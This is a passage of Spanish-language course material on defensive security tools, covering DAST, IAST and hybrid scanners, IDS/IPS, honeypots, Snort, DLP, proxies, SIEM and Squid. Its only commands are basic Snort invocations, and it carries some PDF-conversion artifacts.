vulnerabilidades debido a su naturaleza.
Son capaces de detectar importantes vulnerabilidades incluidas en el OWASP Top
Ten Project, por ejemplo:
• XSS.

• SQLi.
• Path transversal.
• Command injection.
• Defectos de configuración.
• Problemas relacionados con javascript.
• File inclusión.
• Xpath injection.
• Http response spliting.
Debido a que realizan un análisis sintáctico de las peticiones y respuestas que se envían/
reciben de la aplicación, no pueden comprender la semántica de varios parámetros en
su conjunto que pueden esconder un intento de ataque. Por tanto, tienen dificultad en
detectar otras como:
• Vulnerabilidades de diseño relativas a la autenticación, autorización, etc.
• Secuestro de sesiones.
• Information leakage.
Las herramientas de análisis dinámico DAST deberían reunir estas características:
• Ser capaces de identificar un subconjunto aceptable de vulnerabilidades de
seguridad de las aplicaciones web.
• Generar un informe para cada vulnerabilidad detectada, indicando una
acción o conjunto de acciones que sugieren la citada vulnerabilidad.
• Tener un aceptable ratio de falsos positivos.
Hay que tener presente el último punto relativo a los falsos positivos que estas herramientas
pueden tener y que son necesarios de comprobar, al igual que ocurría con el análisis
estático de código fuente. Una buena táctica puede ser correlar los resultados de análisis
estáticos y los de los escáneres automáticos de aplicaciones web para ayudar en el
descarte de falsos positivos. Otra aproximación es aprovechar los resultados del análisis
estático para generar casos de test para elscan automático que permita comprobar la
veracidad de la existencia de la vulnerabilidad reportada por el análisis estático.
En la página del sitio web Web application scanners evaluation criteria se dispone de
un proyecto sobre criterios a tener en cuenta para la evaluación de estas herramientas
y otros muchos recursos e información interesante. Asimismo, se puede consultar una
amplia relación de las herramientas disponibles.
En el trabajo se demuestra que la capacidad de detección de vulnerabilidades y el
rendimiento varían determinando la capacidad de detección de vulnerabilidad de ocho
WVS (tanto abiertas como comerciales) usando dos aplicaciones web vulnerables:
WebGoat y la aplicación web Damn vulnerable (DVWA).
Las ocho herramientas DAST estudiadas fueron: Acunetix; HP WebInspect; IBM AppScan;
OWASP ZAP; Skipfish, Arachni, Vega y IronWASP. El rendimiento se evaluó usando métricas
de evaluación como: precisión; recall; índice de Youden; referencia web OWASP

Web Benchamrk evaluación (WBE) y los criterios de evaluación DAST. Los resultados
experimentales muestran que, mientras que los escáneres comerciales son eficaces en
la detección de vulnerabilidades de seguridad, algunos de código abierto (como como
ZAP y Skipfish) también puede ser eficaces.
FASES DEL ANÁLISIS CON UNA HERRAMIENTA DAST

Las fases que llevar a cabo con una herramienta de análisis dinámico (DAST) son las
siguientes:
• Reconocimiento de las capas de la aplicación. Consiste en averiguar todo

lo posible con respecto a las capas de la aplicación, tecnologías usadas,
OS, servidor de aplicaciones, SGBD, puertos que se utilizan, lenguajes de
programación, de scripting, etc.
• Crawling. Es una fase de descubrimiento de la aplicación web, la estructura
de directorios, formularios, etc. Mediante esta fase se obtiene su contenido
accesible para poder atacarla posteriormente. Se debe hacer manualmente
con la herramienta configurada en modo proxy y, a continuación, se realiza
de forma automática añadiendo una configuración del contexto de análisis
que incluye información de usuario administrador, método de autenticación
utilizado, de gestión de sesiones en su caso, tecnologías, etc.
• Scan pasivo. Es un análisis de las cabeceras de las peticiones GET, POST a la
aplicación web. Se examina la ausencia de determinados parámetros en las
cabeceras que proporcionan seguridad como httponly, que prohíbe acceder
a cookies si no es desde el protocolo HTTP directamente, es decir, prohíbe el
acceso a cookies directamente desde scripts. Lo realiza automáticamente la
herramienta a la vez que el crawling automático.
• Scan activo. Este scan inyecta payloads (strings maliciosos) en los campos de
entrada accesibles de la aplicación y en base a un análisis sintáctico de las
respuestas obtenidas en forma de posibles vulnerabilidades. En esta fase se
aprovecha la configuración del contexto de la aplicación usada en la fase de
crawling automático. Se necesita definir los objetivos inyectables (parámetros
POST, GET, cabeceras, etc.), los posibles vectores de entrada (XML, JSON, etc.)
y la política de test.
• Auditoria de resultados. Esta fase no es automática, la debe realizar
manualmente el analista con ayuda de la herramienta. Las vulnerabilidades
reportadas deben ser confirmadas por el analista o ingeniero de seguridad
para descartar falsos positivos. El análisis que se hace de las respuestas de
tipo sintáctico no es infalible. Se necesita repetir manualmente el ataque para
confirmar cada vulnerabilidad con la ayuda de la herramienta. Finalmente,
utilizando la herramienta, se debe analizar cada punto de la guía de test de
OWASP (desde el punto 4.3 al punto 4.10).

HERRAMIENTAS DE ANÁLISIS INTERACTIVAS (IAST)
Las herramientas de análisis dinámico de caja blanca han surgido como un tipo de
instrumento muy eficaz para descubrir vulnerabilidades en las aplicaciones web en
combinación con los tipos de herramientas SAST y DAST. Un análisis de seguridad de una
aplicación web debe realizarse lo más automáticamente posible utilizando distintos tipos
de herramientas como SAST, DAST, IAST e Híbridas (HAST), incluyendo comprobaciones
manuales para auditoría de los resultados obtenidos con cada tipo, para el descarte de
falsos positivos y también comprobaciones manuales específicas de la funcionalidad
de seguridad con ayuda de utilidades incorporadas en las herramientas DAST, de fuerza
bruta basadas en diccionario, fuzzers, inyectores de código SQL, decodificadores, etc.
Para todas estas acciones se dispone de la ayuda que proporciona la guía de test de la
seguridad OWASP 4.1.
Las herramientas de análisis dinámico de caja blanca se ejecutan en tiempo real a
través de un agente en el lado del servidor. Estas pueden tener acceso al código fuente,
pueden instrumentar el código ejecutable, observar el entorno de ejecución de los
procesos, analizar el contenido de sus variables en memoria y analizar el estado del
proceso en general. Además, analizan las peticiones que se hacen a la aplicación web y
las respuestas que se reciben.
Esto permite detectar vulnerabilidades en los campos de entrada a la aplicación de forma
concreta porque en tiempo real se sigue el funcionamiento de la aplicación. Por tanto, se
puede decir que son similares a las SAST porque se basan en el análisis a nivel de código,
pero a su vez son capaces de analizar el comportamiento de la aplicación internamente.
Ilustración 16. Arquitectura IAST
Las herramientas IAST tienen parte de SAST y parte de DAST, pero solo conceptualmente,
ya que el funcionamiento es diferente. Una vez la herramienta detecta una vulnerabilidad,
la aplicación realiza acciones en tiempo real, según Bermejo (2014):
• Se ejecuta en el servidor y obtiene los resultados del comportamiento que
genera el usuario final sobre la aplicación publicada.
• Permiten la sanitización de las entradas, haciendo que la información que
llega desde la parte cliente sea limpia, eliminando las posibles inyecciones o
ejecuciones remotas.
• Emite alertas a los desarrolladores y administradores para que puedan
corregirlas lo antes posibles.
• La correlación de datos entre herramientas SAST e IAST suele ser más precisa

al tratarse de herramientas de caja blanca.
• Generan un número menor de falsos positivos.
Un factor para tener en cuenta en este tipo de herramientas es que pueden
disminuir el rendimiento de la aplicación al interferir su funcionamiento
normal, sobre todo si la herramienta toma las acciones de bloquear o sanear,
ya que estas acciones pueden sumar tiempo de cómputo a la aplicación que
puede influir en el rendimiento disminuyendo el tiempo de respuesta.
Dentro de esta categoría se distinguen dos tipos de herramientas similares en concepto,
pero con distinto enfoque de uso: Interactive Analysis Security Test (IAST) y Real
Analysis Self Protection (RASP). Según el caso, una vez detectada la vulnerabilidad hay
herramientas que pueden tomar una de las tres acciones siguientes:
• Generar un informe (IAST), después de la detección sin más. Securityscope

de HP‐Foritify es un ejemplo de este tipo. También Acutnetix+Acusensor,
como funcionalidad añadida a ACUNETIX, que es un scanner automático de
vulnerabilidades de aplicaciones web. Seeker, Contrast.
• Bloquear (RASP) los intentos de ataque, como por ejemplo Application
Defender de HP-Fortify o Contrast RASP. Difieren en el concepto de lo que se
hace cuando se detecta una vulnerabilidad: bloqueo o informar.
• Sanear (RASP) la petición maligna a la aplicación web, corrigiendo los valores
de entrada a la aplicación. Saner es un ejemplo de prototipo de sanitización
de entradas (Balzarotti et al. 2008).
HERRAMIENTAS DE ANÁLISIS DE LA SEGURIDAD HÍBRIDAS (HSAT)

Como resultado de la integración y realimentación de los tipos de herramientas anteriores,
existen las llamadas herramientas híbridas, que son aquellas que presentan varias
modalidades de funcionamiento, es decir, SAST + DAST, SAST + IAST o SAST+DAST+IAST e
incluso SAST+DAST+IAST+RASP, como es el caso de la herramienta híbrida de HP. Permiten
realizar dos tipos de escaneos. En ellas se encuentra la combinación de varias tecnologías
en una sola, haciendo que la herramienta sea más completa.
Las herramientas híbridas han ido evolucionando en el tiempo; a medida que lo hacían
por separado SAST, DAST e IAST, permitiendo la correlación de resultados. Un ejemplo de
este modo de funcionamiento sería la herramienta Checkmarx. Esta permite realizar un
análisis de código estático (SAST) y luego un análisis en tiempo real de la aplicación (IAST),
pasando los resultados entre ellas para mejorar su rendimiento y aumentar el número de
detecciones en el análisis de vulnerabilidades.
En la Figura 8 se muestra un prototipo de ejemplo de herramienta HAST con un
componente SAST, que obtiene resultados de vulnerabilidades en una primera fase de
test y que son verificadas posteriormente mediante un segundo componente IAST, con
el objetivo de descartar posibles falsos positivos detectados por la primera fase de test
SAST. Es una eficaz combinación, ya que el análisis IAST en tiempo real puede ser más
preciso a la hora de determinar si una vulnerabilidad es o no un falso positivo.

EJEMPLOS DE HERRAMIENTAS HAST
• Acunetix + Acusensor, es un ejemplo de combinación de análisis DAST-RAST.
• Hp Application Security es un ejemplo de combinación de herramientas
SAST+DAST+RAST+RASP, ofreciendo la posibilidad de correlación automática
de resultados entre ellas.
• Whitehat Security (SAST+DAST+IAST).
• PHP Vulnerability Hunter (open source) (SAST+DAST).
• Fusion Lite Insigh (open source).
8. Herramientas de
seguridad: IDS/IPS- DLP.
PROXY y SIEM
8.1. Sistemas de detección y prevención de intrusos
Debido a la gran interconexión de redes que existe a través de Internet, las redes internas
de las organizaciones se encuentran cada vez más expuestas a posibles ataques. Es
por ello por lo que no es suficiente con asegurar el perímetro de una red, utilizando los
mecanismos, sino que también es necesario el uso de otros mecanismos de seguridad.
Según Gartner (McMillan, 2013), el análisis inteligente de amenazas es un conocimiento
basado en la evidencia que incluye el contexto, mecanismos, indicadores e implicaciones
sobre una amenaza existente o reciente. Este conocimiento puede ser utilizado para
tomar decisiones informadas respecto a la respuesta ante esta amenaza.
En este sentido, el mejor (y primer) complemento a la seguridad perimetral en el análisis
inteligente de amenazas son los mecanismos de detección de intrusiones.
Un sistema de detección de intrusiones (IDS) permite detectar actividades incorrectas,
inapropiadas o anómalas en un sistema. Los sistemas de detección de intrusiones pueden
trabajar en conjunto con un cortafuegos para incrementar el nivel de seguridad, dando
lugar a los sistemas de prevención de intrusiones (IPS).

Un sistema de detección de intrusos (IDS) es un programa que permite
detectar accesos no autorizados a un equipo informático o una red.
Los sistemas IDS permiten la detección de ataques de exploración de red o de un

sistema (sistema operativo de los equipos, versiones de software, hosts activos, escáner
de vulnerabilidades, topología de la red, etc.), ataques de denegación de servicio (DoS o
DDoS) o ataques de acceso a sistemas.
En función de la fuente de la que obtengan los datos utilizados para esta detección de
ataques, se pueden clasificar los IDS en dos tipos:
• Sistemas de detección de intrusos basados en equipo (Host Intrusion
Detection System — HIDS): utilizan programas instalados en los equipos para
intentar detectar modificaciones en equipos afectados por un ataque, y hace
un reporte de sus conclusiones.
• Sistemas de detección de intrusos basados en red (Network Intrusion
Detection System — NIDS): detecta accesos no deseados a la red. Este tipo
de IDS suele incorporar un analizador de paquetes de red (sniffer), con los que
el núcleo del NIDS puede obtener información sobre el tráfico que circula por
la red. Mediante el análisis del tráfico capturado el IDS detecta anomalías que
pueden ser indicio de la presencia de ataques o falsas alarmas. Su interfaz
debe funcionar en modo promiscuo para capturar todo el tráfico que circula
por la red.
Los NIDS suelen desplegarse en modo escucha («Tap mode») utilizando la arquitectura
descrita en la Ilustración 188. Para poder utilizar este modo es necesario contar con un
equipo que tenga dos interfaces de red. Una de las interfaces se encargará de monitorizar
el tráfico de la red, mientras que la otra se encargará de tareas de gestión y administración.
Ilustración 17. NIDS en modo escucha
La interfaz de monitorización está conectada a un dispositivo de escucha (network – tap)

que permite capturar el tráfico de la red. Esta interfaz no tiene asignada una dirección IP
con el fin de reducir las posibilidades de que el atacante la descubra.
Los sistemas IDS también pueden clasificarse en función de la técnica de detección de
ataques utilizada:
• Sistemas de detección de intrusos basados en firmas: disponen de una
base de datos de firmas de ataques conocidos que utilizan para la detección
de estos.
• Sistemas de detección de intrusos basados en anomalías: disponen de un
patrón de comportamiento normal (baseline) frente al que comparan el tráfico
de red o el comportamiento de un sistema para detectar posibles anomalías
que representen un ataque.
Para que un sistema IDS sea efectivo debe actualizarse periódicamente.
Un sistema de prevención de intrusos (IPS) es un caso especial de IDS al

que se le ha añadido un cortafuegos que permite el filtrado del tráfico.
Los IPS ofrecen nuevas funcionalidades con respecto a los IDS ya que, además de permitir
la detección de ataques, son capaces de prevenirlos.
Los IPS suelen desplegarse en modo en línea (on-line mode), utilizando la arquitectura
descrita en la Ilustración 189. El propio IPS se sitúa como un puente entre la red a proteger y
el resto. Dispone de al menos tres interfaces de red: una para recibir tráfico del exterior, otra
para redirigir el tráfico a la red interna y el último para tareas de gestión y administración.
Ilustración 18. IPS en modo en línea.
Esta arquitectura hace posible tener un control total sobre el tráfico que atraviesa la
red. Para que un sistema IPS sea efectivo debe actualizarse periódicamente. Se muestran
a continuación algunos ejemplos de dispositivos, además del ya comentado IDS +
Cortafuegos, que ofrecen funcionalidades de IPS.

SWITCH DE NIVEL DE APLICACIÓN
Normalmente un switch trabaja en la capa dos del modelo OSI, pero debido a la necesidad
de trabajar con grandes anchos de banda cada vez son más comunes los conmutadores
de nivel de aplicación, capa siete del modelo OSI.
Estos dispositivos analizan la información de aplicación (DNS, HTTP, FTP, etc.) para realizar
tareas de balanceo de carga entre varios servidores. Además, algunos conmutadores
incorporan capacidades que proporcionan protección frente a ataques de denegación
de servicio (DoS o DDoS).
IPS DE HOST A NIVEL APLICACIÓN

Al igual que los switches a nivel de aplicación, estos sistemas trabajan en la capa siete
del modelo OSI. Estas herramientas se instalan sobre el sistema final a proteger y analizan
elementos, como la gestión de la memoria, llamadas al sistema o intentos de conexión
de una aplicación.
Para funcionar necesita que el administrador defina unos perfiles en los que se realiza una
fase de entrenamiento que permite establecer un modelo de comportamiento normal
de las aplicaciones y se definen unas políticas de seguridad (IPS basado en anomalías).
Todas las acciones que no estén definidas en el perfil se considerarán un intento de
intrusión y serán bloqueadas por el sistema.
CONMUTADOR HÍBRIDO
Estos dispositivos pueden ser considerados un híbrido entre los switches de nivel de
aplicación y los IPS de host a nivel aplicación, ya que se instalan de la misma manera
que los primeros, pero funcionan a través de la definición de políticas de seguridad como
los segundos. Tiene conocimiento tanto del tipo de servidor que protege como de las
aplicaciones concretas que estás corriendo sobre ellos.
Estos dispositivos tienen la ventaja de que pueden ser configurados mediante la
importación de datos obtenidos mediante un escáner de vulnerabilidades ejecutado
sobre el sistema a proteger. Puede utilizarse en conjunto con un switch de nivel de
aplicación que le redirija únicamente el tráfico que considere malicioso para reducir la
carga de trabajo.
8.2. Sistemas trampa

Los sistemas trampa presentan como novedad respecto a los sistemas tradicionales que
buscan atraer al atacante en lugar de evitarlo.
Pero ¿cómo puede un dispositivo pensado para ser atacado aumentar la seguridad de la
organización? Veamos qué valor aportan a la prevención, detección y respuesta.
• Prevención: por un lado, los honeypot son un mecanismo interesante para

distraer a los atacantes. El tiempo que estos empleen en comprometer estos
sistemas sin información útil ni valor corporativo es tiempo y recursos que
están desperdiciando. Por otro lado, toda la interacción realizada en los
honeypots queda almacenada y permite a los equipos de seguridad aprender
los patrones utilizados y la aparición de nuevas amenazas automáticas.
• Detección: una cuestión crítica en los mecanismos de defensa es poder
distinguir los falsos positivos que estos generan. Cuando el número de falsos
positivos es muy elevado, es complicado llegar a diferenciar a tiempo los
verdaderos ataques de los errores en la detección. Los honeypots, al ser
sistemas falsos, no deben tener tráfico en producción, así que se puede
suponer que toda interacción con ellos será consecuencia de un ataque. Esa
información es de gran ayuda de cara a la detección de verdaderos positivos
en los mecanismos de defensa.
• Respuesta: tras la detección de un ataque, es crucial el tiempo de respuesta
del equipo de defensa y la continuidad de negocio. Existe un coste muy
elevado asociado a la interrupción no programada de la operación de los
sistemas en producción con el objetivo de ser analizados o reparados. El uso
de honeypots nos permite analizar los ataques para disminuir el tiempo de
respuesta en el caso de un ataque al sistema en producción.
TIPOS DE HONEYPOTS
Según la capacidad de interactuar con el atacante que presenten los honeypots, se
pueden distinguir los siguientes tipos:
• Baja interacción: este tipo de honeypot es el más sencillo desde el punto de

vista de implementación y el que supone una menor carga de recursos para
ser desplegado. Este tipo es capaz de emular uno o varios servicios o sistemas
operativos, pero no implementan realmente ninguno de ellos. Por este motivo,
suponen un riesgo muy reducido a la organización que los despliega, pero al
mismo tiempo son fácilmente detectados por atacantes experimentados y
pueden capturar una cantidad de información limitada.
• Alta interacción: este tipo de honeypots utiliza sistemas operativos, servicios y
aplicaciones reales, aunque nunca incluye información real de la organización,
sino datos falsos que faciliten que el atacante crea que está comprometiendo
un sistema en producción. Son capaces de capturar mucha más información
que los de baja interacción, pero si no se protegen adecuadamente podrían
suponer un riesgo para la organización. Comprometer realmente estos
sistemas podría facilitar movimientos laterales dentro de sistemas reales.
• Media interacción: por último, existe un tipo de honeypot que intenta combinar
las ventajas e inconvenientes de los anteriores. La clave de estos dispositivos
es aplicar una capa de virtualización a nivel de aplicación, maximizando la
interacción posible de los atacantes, pero minimizando el riesgo que pueda
suponer un compromiso real del honeypot.
El proyecto T-Pot (Proyecto T-Pot, 2014/2021) ofrece un conjunto de honeypots de baja o

media interacción incluidos en contenedores Docker dentro de una distribución Debia.
Además, facilita la visualización de los datos utilizando Elasticsearch y un dashboard
Kibana.
HONEYPOT
Honeypot es un sistema cuyo objetivo es atraer atacantes simulando ser un sistema
débil o vulnerable a ataques. Estos sistemas están diseñados para captar la atención
del atacante y así poder recopilar información sobre sus métodos y actividades. Para
que el sistema sea efectivo, el atacante no debe notar en ningún momento que está
siendo engañado o monitorizado. Los Honeypots suele situarse detrás de un cortafuegos,
aunque también es posible situarlos delante.
Ilustración 19 Honeypot
Estos sistemas no registran un gran número de datos, pero los que se registran tienen un
gran valor. Son sistemas bastante simples que pueden ser de gran ayuda al administrador
de la red. Por otro lado, si un atacante logra acceder con éxito a un honeypot, podrá
utilizarlo como medio para acceder al resto de sistemas de la red a la que pertenezca.
HONEYNET
Una honeynet es un tipo especial de honeypots que consiste en una red entera diseñada
para ser atacada y recabar más información sobre posibles atacantes. A diferencia
de los honeypots, donde los servicios son emulados, en las honeynets se usan equipos
reales (físicos o virtuales) con sistemas operativos reales y con aplicaciones reales. Las
honeynets se usan principalmente para la investigación de nuevas técnicas de ataque
y para comprobar el modus operandi de los intrusos.

Ilustración 20 Honeynet
Las honeynets ayudan a descubrir nuevos tipos de ataques y permiten mejorar los
motores de los sistemas de detección de intrusiones, así como la incorporación de nuevos
patrones de ataque. Los sistemas atacados para extraer la información no son sistemas
reales, por lo que no existe riesgo.
La principal desventaja de estos sistemas es que es necesario tener un nivel alto de
conocimientos y experiencia en redes y seguridad para poder instalar una honeynet de
utilidad.
PADDED CELL (CÉLULA DE AISLAMIENTO)

Estos sistemas funcionan con un sistema IDS. Cuando el sistema IDS detecta tráfico
malicioso lo redirige hacia el sistema padded cell. Un sistema padded cell simula un
entorno real que atraiga a los atacantes y en el que no puedan causar daño. Al igual
que honeypot y honeynet, los sistemas padded cell son utilizados para comprender los
métodos de ataque de los intrusos.
Para instalar en un entorno real un sistema padded cell puede utilizarse un sistema «Bait
and Switch». «Bait and Switch» utiliza el IDS Snort para detectar los ataques y se instala
en un sistema que tenga al menos tres interfaces de red de manera que cuando detecta
tráfico malicioso, lo redirecciona hacia el sistema padded cell sin que el atacante se dé
cuenta.

Ilustración 21 Padded cell: Bait and Switch.
Los sistemas padded cell permiten conocer la forma en la que actúan los atacantes
potenciales, facilitando la tarea de proteger la red al administrador.
La principal desventaja de estos sistemas es que el administrador debe tener un nivel
alto de conocimientos y experiencia en redes y seguridad para poder instalar el sistema.
En el vídeo, Sistemas trampa en funcionamiento, se muestran ejemplos de uso de sistemas
trampa de los tres tipos: alta, baja y media interacción.
8.3. Funcionamiento práctico: Snort

Snort es una herramienta que aglutina las capacidades de un analizador de paquetes,
tanto de un sistema de detección como de prevención de intrusos (IDS e IPS). Originalmente,
en 1998, fue ideado como una herramienta de análisis de paquetes de red implementada
sobre libcap y, poco a poco, se fue convirtiendo en lo que hoy en día es el IPS open source
más utilizado mundialmente. Es mantenido y desarrollado actualmente por CISCO, que
compró en 2013 la empresa Sourcefire. Puedes ver más detalles en su manual oficial
(SNORT R© Users Manual 2.9.16, 2020).
Snort puede trabajar en tres modos diferentes:
• Modo sniffer: lee los paquetes que atraviesan la interfaz de red monitorizada
y los muestra por consola.
• Modo logger de paquetes: en lugar (o de forma adicional) de mostrar los
paquetes por consola, los almacena en disco para su posterior análisis.
• Modo sistema de detección de intrusos en red (NIDS): en este modo realiza
una detección y análisis del tráfico de red con base en las reglas cargadas.
Este es el modo más complejo y flexible que ofrece.
• Componentes clave de Snort

La arquitectura básica de Snort se divide en cuatro componentes:
• Sniffer.
• Preprocesador.
• Motor de detección.
• Salida.
El componente sniffer captura los paquetes de la interfaz especificada. El preprocesador
los formatea de modo que sean más fácilmente interpretables por el motor de detección
que, con base en el conjunto de reglas cargado, tomará la decisión de lanzar o no una
alerta o almacenar el paquete (componente de salida).
Ilustración 22. Esquema de la arquitectura de Snort
SNORT COMO SNIFFER O LOGGER DE PAQUETES

Para lanzar Snort en modo sniffer, se ejecuta el siguiente comando (ver Figura 7 con un
ejemplo de ejecución de este comando):
Unexpected text node: ‘snort -dev’
Los parámetros incluidos sirven para:

• -v: mostrar todos los paquetes por consola (solo cabeceras TCP).
• -e: mostrar cabeceras de TCP, UDP e ICMP.
• -d: mostrar cabeceras de TCP, UDP e ICMP.
Para lanzarlo en modo logger, es necesario añadir el parámetro -l que especifica el
directorio en el que guardar los paquetes capturados. Por ejemplo:
Unexpected text node: ‘snort -dev -l /var/log/snort’

Ilustración 23 Inicio de Snort en modo sniffer.
Si se quiere ahorrar tiempo de procesamiento y espacio en disco es deseable utilizar la

opción -b para almacenar los paquetes en formato binario. En este modo no es necesario
especificar los parámetros v, d y e, bastaría con ejecutar:
Unexpected text node: ‘snort -b -l /ruta/al/directorio/log’
Para cada archivo de log Snort añade un sello temporal (timestamp) al nombre de
archivo.
Al finalizar la captura se muestra un resumen de estadísticas similar al mostrado en la
Figura 8.
Ilustración 24 Estadísticas que muestra Snort tras un período de captura

SNORT COMO NIDS
Para lanzar Snort en modo NIDS se añade el archivo que contiene la definición de reglas
en las que se indicará qué condiciones implicarán que un paquete sea detectado como
una alerte o como un paquete legítimo.
Unexpected text node: ‘snort -c /ruta/al/snort.conf -l /ruta/al/directorio/log’
Pueden verse los parámetros más comunes de Snort en la Figura 9. El parámetro -r es

especialmente utilizado en foros, con las capturas que se han almacenado durante un
incidente de seguridad.
Tabla 5 Lista de parámetros comunes de Snort
REGLAS Y ACCIONES EN SNORT

La definición de una regla se puede dividir en dos partes: cabecera y opciones. Como
puede verse en la Figura 10, la cabecera comienza con la acción definida para el paquete
que cumpla sus condiciones, y sigue por el protocolo, IP origen, puerto origen, dirección
del flujo de la comunicación, IP destino y puerto destino.
Ilustración 25 Estructura de una regla Snort

Las acciones posibles se resumen en la siguiente lista:
• alert – genera una alerta y guarda el paquete.
• log – guarda el paquete.
• pass – ignora el paquete.
• activate – lanza una alerta y activa otra regla.
• dynamic – permanece inactiva hasta que se activa por una regla activate.
Después actúa como una regla de log.
• drop – bloquea y guarda el paquete.
• reject – bloquea, guarda el paquete y envía un TCP reset si el protocolo es TCP
o un ICMP port unreachable si el protocolo es UDP.
• sdrop – bloquea el paquete, pero no lo guarda.
Por último, existen numerosas opciones que pueden influir en una regla. A continuación,
se muestran algunas de las más comunes:
• msg:
«Mensaje» Mensaje que se muestra asociado a esta alerta.
• sid: <Identificador único>
Identificador único de la regla. Los valores hasta 1 000 000 están reservados para reglas
de carácter general.
• rev: <Identificador de la revisión>
• Identificador de revisión (cambio) de la regla. Cada actualización o
modificación de regla es una revisión.
8.4. Sistemas de prevención de fugas de datos (DLP)

Las organizaciones generan grandes cantidades de datos cada día, los cuales necesitan
proteger para evitar que accedan a ellos de forma errónea o fraudulenta, tanto por
usuarios internos que actúan de forma negligente o maliciosa como por atacantes
externos.
Para prevenir estas fugas de información se han diseñado los sistemas DLP (Data Loss
Prevention). Estos sistemas protegen las redes de transferencias de datos no autorizadas
dentro o fuera de una organización. Estos sistemas analizan la información en uso, en
movimiento y en reposo, tratando de evitar la pérdida del control sobre información
sensible de una organización.
En función del objetivo y el tipo de información analizada tenemos diferentes tipos de
DLP:
• DLP de red: se despliega cerca del perímetro de la red para analizar el tráfico
y detectar si se está enviado información sensible sin permiso, en cuyo caso

bloquea esa información y genera una alerta.
• DLP en estación de trabajo: se despliega en las estaciones de trabajo o
servidores de la organización para analizar los movimientos de información
dentro de ese equipo, bien entre diferentes usuarios o información que se
quiera enviar al exterior. En caso de detectar que la transmisión de información
no cumple la política de seguridad se bloquea dicho envío de información.
• DLP en centros de datos: se despliega en un centro de datos y el objetivo
es monitorizar un conjunto de equipos, normalmente orientados al
almacenamiento de datos como puede ser un NAS, con el objetivo de detectar
información que pueda estar almacenada en estos incumpliendo la política
de seguridad de la organización.
Un componente esencial de los sistemas DLP son los mecanismos para la detección de
la información sensible de una organización, entre los que destacan:
• Exact Data Match (EDM): esta técnica identifica la información sensible de
la organización, generando un hash para ellos y registrándolo en el DLP y
definiendo las políticas de seguridad que se deben cumplir para cada tipo de
información, siendo luego la base para la toma de decisiones.
• Indexed Document Matching (IDM): esta técnica crea una huella de los
documentos sensibles de la organización y los indexa. Posteriormente, en la
política de seguridad se indica el porcentaje de similitud que deben cumplir
los documentos para contar como coincidencia. Admite una amplia variedad
de tipos de ficheros como documentos de Microsoft Office, PDF, ficheros
multimedia, JPEG, etc.
• Vector Machine Learning (VML): esta técnica consiste en realizar un análisis
estadístico sobre datos no estructurados y de los que no es posible crear una
huella. El análisis determina si el contenido que está siendo analizado es similar
al utilizado durante la fase de entrenamiento.
• Described Content Matching (DCM): esta técnica detecta contenido
revisando coincidencias en palabras clave, expresiones regulares, patrones o
propiedades de un fichero.
• File type detection: esta técnica detecta los tipos de ficheros con base en la
lista establecida y es capaz de analizar el contenido de ficheros empaquetados
como ficheros de correo o comprimidos.
8.5. Servidores Proxy

Los proxies son un punto de conexión entre una computadora y un sitio remoto de Internet.
Ofrecen un filtro mediante el cual se permite conexiones externas a la red.
La implantación de un proxy en una red tiene múltiples propósitos:
• Restringir que los usuarios entren a ciertas zonas de la red.
• Evitar los ataques a nivel de protocolo o aplicación desde el exterior.
• Permitir/denegar el acceso a Internet de los usuarios de la red.

• Evitar la divulgación de datos personales dese el exterior de la red
Existen varios tipos de proxy:
• Proxy de aplicación: consiste en un servidor que a su vez es un filtro de la

aplicación a utilizar. El protocolo de proxy más utilizado es el HTTP (web). El
servidor proxy decide si permite o no que esa aplicación conecte con un
servidor en el Internet público.
• Gateway o Proxy de circuito: funciona redirigiendo paquetes, pero no es
capaz de procesar o filtrar paquetes. Monitoriza los paquetes TCP y UDP.
• Proxy NAT o Enmascaramiento de IP: implementa una serie de IP privadas de
red local y el enrutador se encarga hacer la conversión de las direcciones IP y
los puertos. Mantiene el anonimato de una red privada.
• Proxy web cache: este proxy mantiene en caché las páginas más visitadas
para, de esta manera, disminuir el tráfico de datos y mejorar la velocidad de
la red. Este proxy no permite el acceso libre de Internet filtrando y bloqueando
contenido potencialmente peligroso, como pueden ser ciertas páginas web.
• Proxy transparente: encamina las conexiones para que sean realizadas
desde el proxy sin intervención del cliente. Este tipo de servidores refuerzan la
seguridad del uso de la red y también proveen de servicios de caché.
• Proxy inverso: Muy utilizada para balancear la carga en granjas con varios
servidores web. Proporciona un punto común para todas las peticiones
web y redirecciona las llamadas entre varios servidores según la carga y
disponibilidad de estos.
Los proxies se colocan como intermediarios entre dos redes, de forma que el tráfico que
se intercambia entre ellas debe circular a través de este.
8.6. Gestores de Eventos de Seguridad (SIEM)

Los SIEM están orientados a la captura de información en tiempo real de los eventos de
seguridad generados en la red de una empresa, para comprobar dicha información y
generar las alertas que corresponda para que los operadores del sistema puedan llevar
a cabo las acciones que corresponda.
Están compuestos por diferentes módulos:
• Agente: componente desplegado en los sistemas que son la fuente de los logs
que se quieren integrar en el SIEM.
• Servidor: componente que lleva a cabo la correlación de los eventos, es
decir, que analiza los logs que recibe de las diferentes fuentes y agrega todos
aquellos que hacen referencia a un mismo tipo de ataque.

• Base de datos: componente en el que se van almacenando los logs que se
van recibiendo desde las sondas para su análisis.
• Interfaz: componente desde el que se lleva a cabo tanto la configuración del
SIEM como la operación de este, mostrando al operador las alertas que se van
generando.
El proceso de trabajo de un SIEM se puede resumir en los siguientes pasos:
1. Recolección de datos. Las agentes que han sido desplegados se encargan de enviar
la información al servidor central para un análisis. Estos datos son almacenados y
protegidos contra modificaciones no autorizadas.
2. Correlación de eventos. El servidor analiza los logs que va recibiendo de las
diferentes fuentes para identificar las relaciones entre ellos. De esta forma, pasamos
de una cantidad enorme de datos en bruto a un conjunto de datos que pueden
ser analizados de una forma más sencilla.
3. Lanzar alertas. Si una vez correlacionados los eventos, se detecta que se trata de
un ataque, se debe lanzar una alerta para que el usuario pueda llevar a cabo las
acciones oportunas.
8.7. Funcionamiento práctico: Squid

Debido al gran crecimiento que ha tenido Internet en estos últimos años, se hace necesaria
la replicación para transmitir páginas web de manera más rápida y económica.
Una solución a esto puede ser los servidores proxy basados en Squid, los cuales son
un intermediario entre el cliente e Internet. Los clientes mandan su petición al servidor
proxy y este tramita la petición a Internet o le responde directamente con el objeto si se
encuentra almacenado en su memoria caché (debido a una petición similar anterior).
Squid es un tipo de proxy caché que puede terminar como servidor intermedio y como
caché del contenido web. Admite protocolos HTTP, HTTPS, FTP, WWCP, WAIS, Gopher, etc.
Las características más importantes de Squid son las siguientes:
• Almacena en memoria RAM los objetos más frecuentes y sus metadatos.

• Cachea las consultas DNS.
• Implementa políticas de control de acceso.
• Soporta conexiones SSL/TLS.
• Puede reescribir consultas.
• Permite el protocolo SNMP.
